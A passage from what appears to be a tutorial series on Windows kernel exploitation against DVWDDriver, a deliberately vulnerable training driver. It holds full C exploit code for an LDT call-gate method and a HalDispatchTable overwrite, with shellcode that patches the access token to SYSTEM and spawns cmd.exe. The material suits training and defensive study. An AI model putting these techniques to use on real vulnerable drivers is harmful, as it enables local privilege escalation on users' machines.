     pLDTDesc->LimitLow     = 0xFFFF;
     pLDTDesc->HighWord.Bits.BaseHi  = (LDTBase & 0xFF000000) >> 24;
     pLDTDesc->HighWord.Bits.BaseMid = (LDTBase & 0x00FF0000) >> 16;
     pLDTDesc->HighWord.Bits.Type = 2;
     pLDTDesc->HighWord.Bits.Pres  = 1;
    }
    
    
    // Assembly wrapper to the payload to be able to return from the Call-Gate ------
    // (using a FAR RET)
    #define OFFSET_SHELLCODE 18
    CHAR ReturnFromGate[]="\x90\x90\x90\x90\x90\x90\x90\x90"
           "\x60"                  // pushad       save general purpose registers
           "\x0F\xA0"              // push  fs     save FS segment register
           "\x66\xB8\x30\x00"      // mov  ax, 30h   
           // FS value is different between userland (0x3B) and kernelland (0x30)
           "\x8E\xE0"              // mov  fs, ax     
           "\xB8\x41\x41\x41\x41"  // mov  eax, @Shellcode  invoke the payload
           "\xFF\xD0"              // call  eax  
           "\x0F\xA1"              // pop   fs     restore general purpose registers
           "\x61"                  // popad        restore FS segment register
           "\xcb";                 // retf       far ret
    
           
    // Assembly code that executes a CALL to 0007:00000000 ----------------------------
    // (Segment selector: 0x0007, offset address: 0x00000000)
    // 16-bit segment selector:
    // [ 13-bit index into GDT/LDT ][0=descriptor in GDT/1=descriptor in LDT]
    // [Requested Privilege Level: 00=ring0/11=ring3]
    // => 0007 means: index 0 into GDT (first entry), descriptor in LDT, ring3
    VOID FarCall() {
     __asm { 
       _emit 0x9A
       _emit 0x00
       _emit 0x00
       _emit 0x00
       _emit 0x00
       _emit 0x07
       _emit 0x00
     }
    }
    
    // Use the vulnerability to overwrite the LDT Descriptor into GDT ------------------
    BOOL OverwriteGDTEntry(ULONG64 LDTDesc, PVOID *KGDTEntry) {
    
     HANDLE hFile;
     ARBITRARY_OVERWRITE_STRUCT overwrite;
     ULONG64 storage = LDTDesc;
     BOOL ret;
     DWORD dwReturn;
    
     hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
    
     if(hFile != INVALID_HANDLE_VALUE) {
      overwrite.Size = 8;
      overwrite.StorePtr = (PVOID)&storage;
      ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
    
      overwrite.Size = 8;
      overwrite.StorePtr = (PVOID)KGDTEntry;
      ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
    
      CloseHandle(hFile);
    
      return TRUE;
     }
    
     return FALSE;
    }
    
    
    // Create a new LDT using ZwSetInformationProcess ----------------------------------
    BOOL SetLDTEnv(VOID) {
    
     NTSTATUS retStatus;
     LDT_ENTRY eLdt;
     PROCESS_LDT_INFORMATION infoLdt; 
     _ZwSetInformationProcess ZwSetInformationProcess;
    
     // Retrieve the address of the undocumented syscall ZwSetInformationProcess()
     ZwSetInformationProcess = (_ZwSetInformationProcess)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwSetInformationProcess");
    
     if(!ZwSetInformationProcess)
      return FALSE;
    
     // Create and initialize a new LDT
     RtlZeroMemory(&eLdt, sizeof(LDT_ENTRY));
    
     RtlCopyMemory(&(infoLdt.LdtEntries[0]), &eLdt, sizeof(LDT_ENTRY));
     infoLdt.Start = 0;
     infoLdt.Length = sizeof(LDT_ENTRY);
    
     retStatus = ZwSetInformationProcess(GetCurrentProcess(), 
                 ProcessLdtInformation, 
                 &infoLdt, 
                 sizeof(PROCESS_LDT_INFORMATION));
    
     if(retStatus != STATUS_SUCCESS)
      return FALSE;
    
     return TRUE;
    }
    
    
    #define LDT_DESC_FROM_KPROCESS 0x20
    ULONG64 LDTDescStorage32=0;
    
    // Main function -------------------------------------------------------------------
    BOOL LDTDescOverwrite32(VOID) {
    
     PVOID kprocess,kprocessLDTDesc;
     PLDT_ENTRY pLDTDesc = (PLDT_ENTRY)&LDTDescStorage32;
     PVOID ReturnFromGateArea = NULL;
     PCALL_GATE32 pGate = NULL;
    
     // User standard SIDList Patch
     FARPROC KernelPayload = (FARPROC)UserShellcodeSIDListPatchCallGate;
    
     // Retrieve the KPROCESS Address == EPROCESS Address
     kprocess = FindCurrentEPROCESS();
     if(!kprocess)
      return FALSE;
    
     // Address of LDT Descriptor
     // kd> dt nt!_kprocess
     kprocessLDTDesc = (PBYTE)kprocess + LDT_DESC_FROM_KPROCESS;
     printf("[--] kprocessLDTDesc found at: %p\n", kprocessLDTDesc);
    
     // Create a new LDT entry
     if(!SetLDTEnv())
      return FALSE;
    
     // Fixup the Gate Payload (replace 0x41414141 by the address of the kernel payload)
     // and put it into executable memory
     RtlCopyMemory(ReturnFromGate + OFFSET_SHELLCODE, &KernelPayload, sizeof(FARPROC));
     ReturnFromGateArea = CreateUspaceExecMapping(1);
     RtlCopyMemory(ReturnFromGateArea, ReturnFromGate, sizeof(ReturnFromGate));
    
     // Build the Call-Gate(system descriptor), we pass the address of the shellcode
     pGate = CreateUspaceMapping(1);
     PrepareCallGate32(pGate, (PVOID)ReturnFromGateArea);
    
     // Build the fake LDT Descriptor with a Call-Gate (the one previously created) 
     PrepareLDTDescriptor32(pLDTDesc, (PVOID)pGate);
    
     printf("[--] LDT Descriptor fake: 0x%llx\n", LDTDescStorage32);
    
     // Trigger the vulnerability: overwrite the LdtDescriptor field in KPROCESS
     OverwriteGDTEntry(LDTDescStorage32, kprocessLDTDesc);
     
     // We force a process context switch
     // Indeed, the LDT segment descriptor into the GDT is updated only after a context 
     // switch. So, it's needed before being able to use the Call-Gate
     Sleep(1000);
    
     // Trigger the call gate via a FAR CALL (see assembly code)
     FarCall();
    
     return TRUE;
    }
    
    
    // This is where we begin ... ------------------------------------------------
    BOOL TriggerOverwrite32_LDTRemappingWay() {
     
     // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
     if(LoadAndGetKernelBase() == FALSE)
      return FALSE;
    
     // We exploit the vulnerability with a payload that patches the SID list to get 
     // SYSTEM privilege and then we spawn a shell if it succeeds
     if(LDTDescOverwrite32() == TRUE) {
      if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
       wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
       return FALSE;
      }
     }
     
     return TRUE;
    }
    


    7. w00t ?


    The exploit is working well as we can see:

    w00t again !!


    References

    [1] GDT and LDT in Windows kernel vulnerability exploitation, by Matthew "j00ru" Jurczyk & Gynvael Coldwind, Hispasec (16 January 2010)

    [2] Intel Manual Vol. 3A & 3B
    http://www.intel.com/products/processor/manuals/

    [3]
    Task State Segment (TSS)

    Windows Kernel Exploitation Basics - Part 2 : Arbitrary Memory Overwrite exploitation using HalDispatchTable



    In this article, we will see a method to exploit the write-what-where vulnerability (Arbitrary Memory Overwrite) present in the DVWDDriver. This method consists in overwriting a pointer in a kernel dispatch table. Such tables are used by the kernel to store various pointers. Example of such tables:
    • The SSDT (System Service Descriptor Table) nt!KeServiceDescriptorTable stores addresses of syscalls; it is used by the kernel in order to dispatch syscalls (more information in [1]).
    • The HAL Dispatch Table nt!HalDispatchTable. HAL (Hardware Abstraction Layer) is used in order to isolate the OS from the hardware. Basically, it permits to run the same OS on machines with different hardwares. This table stores pointers to routines used by the HAL.
    Here, we will overwrite a specific pointer into the HalDispatchTable. Let's see why and how... =) The big reference for everything that is sum up here is the paper [2].

    1. NtQueryIntervalProfile() and HalDispatchTable

    According to [3], NtQueryIntervalProfile() is an undocumented system call exported by ntdll.dll that retrieves currently set delay between performance counter's ticks. It calls the KeQueryIntervalProfile() function exported by the kernel executive ntoskrnl.exe. If we disassemble that function, we can see the following:



    So, a call to the routine located at the address nt!HalDispatchTable+0x4 is done (see the red box). Therefore, if we overwrite the pointer at that address - that's to say the second pointer into the HalDispatchTable - with the address of our shellcode; and then if we call the function NtQueryIntervalProfile(), our shellcode will be executed !


    2. Methodology of exploitation

    Note: GlobalOverwriteStruct is the global structure used by the driver for storing a buffer and its size.

    In order to exploit the Arbitrary Memory Overwrite vulnerability, the basic idea is to:
    1. Use the DVWDDriver's IOCTL DEVICOIO_DVWD_STORE in order to store the address of our shellcode into the buffer of the structure GlobalOverwriteStruct that lies in kernelland. Remember that the address we pass in parameter must be in the user memory address space (ie. address <= 0x7FFFFFFF) because a check is done in the IOCTL handler using the function ProbeForRead(). Ok, no problem, we just pass a pointer to the address of our shellcode (of course, it points to userland) ! So, the struct we pass to the driver contains this pointer and the value 4 for the size of the buffer.
    2. Then, use the DVWDDriver's IOCTL DEVICOIO_DVWD_OVERWRITE in order to write the content of the buffer located at the address stored into the buffer of GlobalOverwriteStruct - that's to say the previously added address of the shellcode - at the address passed in parameter. Remember that this time, there is no check in the IOCTL handler and so, this address can be everywhere, whether in userland or in kernelland. Therefore, we will pass  the address of the second entry in the HalDispatchTable, of course this is in kernelland.
    So to sum up, we abuse the IOCTL  DEVICOIO_DVWD_OVERWRITE in order to write what we want, where we want:
    • what =  address of our shellcode,
    • where = address of nt!HalDispatchTable+0x4
    It's important to understand that it's necessary to control those 2 components in order to exploit that kind of vulnerability.

    NB: Here, we can overwrite the whole addresses (4 bytes) but we can imagine a case where we can only overwrite 1 byte. In such a scenario, it's necessary to overwrite the MSB (Most Significant Byte) of the second entry of HalDispatchTable with a value that makes the address in userland (< 0x80000000): for example, we can take 0x01. Then, we need to put a large NOP sled in the address range 0x01000000-0x02000000 (memory marked as RWX) with a jump to our shellcode at the end.

    Hey... wait ! I have to talk about the shellcode we use...


    3. Shellcoding... patch my Access Token and go back to Ring 3
     
    It's not like when we're exploiting a software in userland, here our shellcode will be executed in kernelland and so we don't have the right to do any mistake or we will get a BSOD in our face. Typically in kernel local exploitation, we use the full privileges we have when we are in Ring 0 in order to patch the Access Token of the current process to change the User SID of the process by the SID of NT AUTHORITY\SYSTEM. And then, we go back to Ring 3 as quickly as possible and then, we can do what we want such as spawning a shell.

    In Windows, the Access Token (or just called Token) is used for describing the security context of a process or a thread. In particular, it stores the User SID, a list of Groups SIDs and a list of Privileges. Based on this information, the kernel is able to decide if an action asked by the process is authorized or not (access control). In user space, it's possible to get an handle on a Token. More information about Tokens is given in [4].
    Here is the detail of the structure _TOKEN used for describing an Access Token:

    kd> dt nt!_token
       +0x000 TokenSource      : _TOKEN_SOURCE
       +0x010 TokenId          : _LUID
       +0x018 AuthenticationId : _LUID
       +0x020 ParentTokenId    : _LUID
       +0x028 ExpirationTime   : _LARGE_INTEGER
       +0x030 TokenLock        : Ptr32 _ERESOURCE
       +0x038 AuditPolicy      : _SEP_AUDIT_POLICY
       +0x040 ModifiedId       : _LUID
       +0x048 SessionId        : Uint4B
       +0x04c UserAndGroupCount : Uint4B
       +0x050 RestrictedSidCount : Uint4B
       +0x054 PrivilegeCount   : Uint4B
       +0x058 VariableLength   : Uint4B
       +0x05c DynamicCharged   : Uint4B
       +0x060 DynamicAvailable : Uint4B
       +0x064 DefaultOwnerIndex : Uint4B
       +0x068 UserAndGroups    : Ptr32 _SID_AND_ATTRIBUTES
       +0x06c RestrictedSids   : Ptr32 _SID_AND_ATTRIBUTES
       +0x070 PrimaryGroup     : Ptr32 Void
       +0x074 Privileges       : Ptr32 _LUID_AND_ATTRIBUTES
       +0x078 DynamicPart      : Ptr32 Uint4B
       +0x07c DefaultDacl      : Ptr32 _ACL
       +0x080 TokenType        : _TOKEN_TYPE
       +0x084 ImpersonationLevel : _SECURITY_IMPERSONATION_LEVEL
       +0x088 TokenFlags       : UChar
       +0x089 TokenInUse       : UChar
       +0x08c ProxyData        : Ptr32 _SECURITY_TOKEN_PROXY_DATA
       +0x090 AuditData        : Ptr32 _SECURITY_TOKEN_AUDIT_DATA
       +0x094 LogonSession     : Ptr32 _SEP_LOGON_SESSION_REFERENCES
       +0x098 OriginatingLogonSession : _LUID
       +0x0a0 VariablePart     : Uint4B

    The list of pointers to SIDs is stored in the field UserAndGroups (type _SID_AND_ATTRIBUTES). We can retrieve information contained into a Token for a given process with kd, as follows (example with the "System" process):

    kd> !process 0004
    Searching for Process with Cid == 4
    Cid handle table at e1ed7000 with 428 entries in use
    
    PROCESS 827a6648  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
        DirBase: 00587000  ObjectTable: e1000c60  HandleCount: 388.
        Image: System
        VadRoot 82337238 Vads 4 Clone 0 Private 3. Modified 5664. Locked 0.
        DeviceMap e1001070
        Token                             e1001720
        ElapsedTime                       00:37:34.750
        UserTime                          00:00:00.000
        KernelTime                        00:00:01.578
        QuotaPoolUsage[PagedPool]         0
        QuotaPoolUsage[NonPagedPool]      0
        Working Set Sizes (now,min,max)  (43, 0, 345) (172KB, 0KB, 1380KB)
        PeakWorkingSetSize                526
        VirtualSize                       1 Mb
        PeakVirtualSize                   2 Mb
        PageFaultCount                    4829
        MemoryPriority                    BACKGROUND
        BasePriority                      8
        CommitCharge                      8
    
    
    kd> !token e1001720
    _TOKEN e1001720
    TS Session ID: 0
    User: S-1-5-18
    Groups:
     00 S-1-5-32-544
        Attributes - Default Enabled Owner
     01 S-1-1-0
        Attributes - Mandatory Default Enabled
     02 S-1-5-11
        Attributes - Mandatory Default Enabled
    Primary Group: S-1-5-18
    Privs:
     00 0x000000007 SeTcbPrivilege                    Attributes - Enabled Default
     01 0x000000002 SeCreateTokenPrivilege            Attributes -
     02 0x000000009 SeTakeOwnershipPrivilege          Attributes -
    [...]

    Well, the idea is actually to replace the pointer to the process owner's SID by a pointer to the built-in NT AUTHORITY\SYSTEM SID (S-1-5-18). We also patch the group BUILTIN\Users SID (S-1-5-32-545) with the group BUILTIN\Administrators SID (S-1-5-32-544).

    The source code is in the file Shellcode32.c. It's taken from DVWDDriver, I've just added many comments to make it easily understandable.


    4.To sum up...
     
    Here is what we need to do in the exploit:
    1. Load the kernel executive ntoskrnl.exe in userland in order to be able to get the offset of HalDispatchTable and then to deduce its address in kernelland.
    2. Retrieve the address of our shellcode. This is actually the address of the function aimed to patch the Access Token. But... there is a tricky point to notice: the pointer that we overwrite in HalDispatchTable normally points to a function which takes 4 arguments (4 values are pushed on the stack before: call dword ptr [nt!HalDispatchTable+0x4]). Therefore, we use a shellcode function with 4 arguments, just for compatibility reasons.
    3. Retrieve the address of the syscall NtQueryIntervalProfile() within ntdll.dll.
    4. Overwrite the pointer at nt!HalDispatchTable+0x4 with the address of our shellcode function.. yeah the one with 4 arguments that patches the process' Token. This is done by calling DeviceIoControl() 2 consecutive times for sending 2 IOCTL: DEVICOIO_DVWD_STORE and then DEVICOIO_DVWD_OVERWRITE in the way it was explained in paragraph 2.
    5. Call the function NtQueryIntervalProfile() in order to launch the shellcode
    6. Well.. at this point the process is running under the System account, so we're done and we can spawn a shell for example, or do what else we want !
    A global overview is given in the following figure taken from [2]


      5. Exploit code

      Here is the code of the exploit developed by the authors of DVWDDriver. When I've read that code, I've added many comments in order to be sure to understand everything that is done. With the previous explanation, it should be actually quite easy to understand, nothing is very tricky here =)

      // ----------------------------------------------------------------------------
      // Arbitrary Memory Overwrite exploitation ------------------------------------
      // ---- HalDispatchTable pointer overwrite method -----------------------------
      // ----------------------------------------------------------------------------
      
      
      // Overwrite kernel dispatch table HalDispatchTable's second entry:
      //  - STORE the address of the shellcode (pointer in kernelland, points to userland)
      //  - OVERWRITE the second pointer in the HalDispatchTable with the address of the shellcode
      BOOL OverwriteHalDispatchTable(ULONG_PTR HalDispatchTableTarget, ULONG_PTR ShellcodeAddrStorage) {
      
       HANDLE hFile;
       BOOL ret;
       DWORD dwReturn;
       ARBITRARY_OVERWRITE_STRUCT overwrite;
      
       // Open handle to the driver
       hFile = CreateFile(L"\\\\.\\DVWD", 
              GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
              NULL, 
              OPEN_EXISTING, 
              0, 
              NULL);
      
       if(hFile != INVALID_HANDLE_VALUE) {
       
        // DEVICEIO_DVWD_STORE
        // -> store the address of the shellcode into kernelland (GlobalOverwriteStruct) 
        overwrite.Size = 4;
        overwrite.StorePtr = (PVOID)&ShellcodeAddrStorage;
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
      
        // DEVICEIO_DVWD_OVERWRITE 
        // -> copy the content of the buffer in kernelland (the address previously added)
        // to the location HalDispatchTableTarget (second entry in the HalDispatchTable)
        overwrite.Size = 4;
        overwrite.StorePtr = (PVOID)HalDispatchTableTarget;
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
      
        CloseHandle(hFile);
        
        return TRUE;
       }
      
       return FALSE;  
      }
      
      
      
      typedef NTSTATUS (__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval);
      BOOL TriggerOverwrite32_NtQueryIntervalProfileWay() {
      
       ULONG dummy = 0;
       ULONG_PTR HalDispatchTableTarget;
       ULONG_PTR ShellcodeAddrStorage; 
      
       _NtQueryIntervalProfile NtQueryIntervalProfile;
      
       // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
       if(LoadAndGetKernelBase() == FALSE) {
        return FALSE;
       }
      
       // Retrieve the address of the shellcode
       ShellcodeAddrStorage = (ULONG_PTR)UserShellcodeSIDListPatchUser4Args;
       
       // Retrieve the address of the second entry within the HalDispatchTable
       HalDispatchTableTarget = HalDispatchTable + sizeof(ULONG_PTR);
       
       // Retrieve the address of the syscall NtQueryIntervalProfile within ntdll.dll
       NtQueryIntervalProfile  = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
      
       // Overwrite the pointer in HalDispatchTable
       if(OverwriteHalDispatchTable(HalDispatchTableTarget, ShellcodeAddrStorage) == FALSE) {
        return FALSE;
       }
      
       // Call the function in order to launch our shellcode
       // kd> u nt!KeQueryIntervalProfile
       NtQueryIntervalProfile(2, &dummy);
      
       if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
        wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
        return FALSE;
       }
      
       return TRUE;
      }
      

      6. w00t ?

      It's time to try the exploit:
      DVWDExploit.exe --exploit-overwrite-profile-32


      Yeah !! we spawn a shell cmd.exe that is running with NT AUTHORITY\SYSTEM privileges. w00t =)


      References

      [1] SSDT Uninformed article
      http://uninformed.org/index.cgi?v=8&a=2&p=10

      [2] Exploiting Common Flaws in Drivers, by Ruben Santamarta
      http://reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1

      [3] NtQueryIntervalProfile(),
      http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Profile/NtQueryIntervalProfile.html

      [4] Windows Internals, book by Mark Russinovich & David Salomon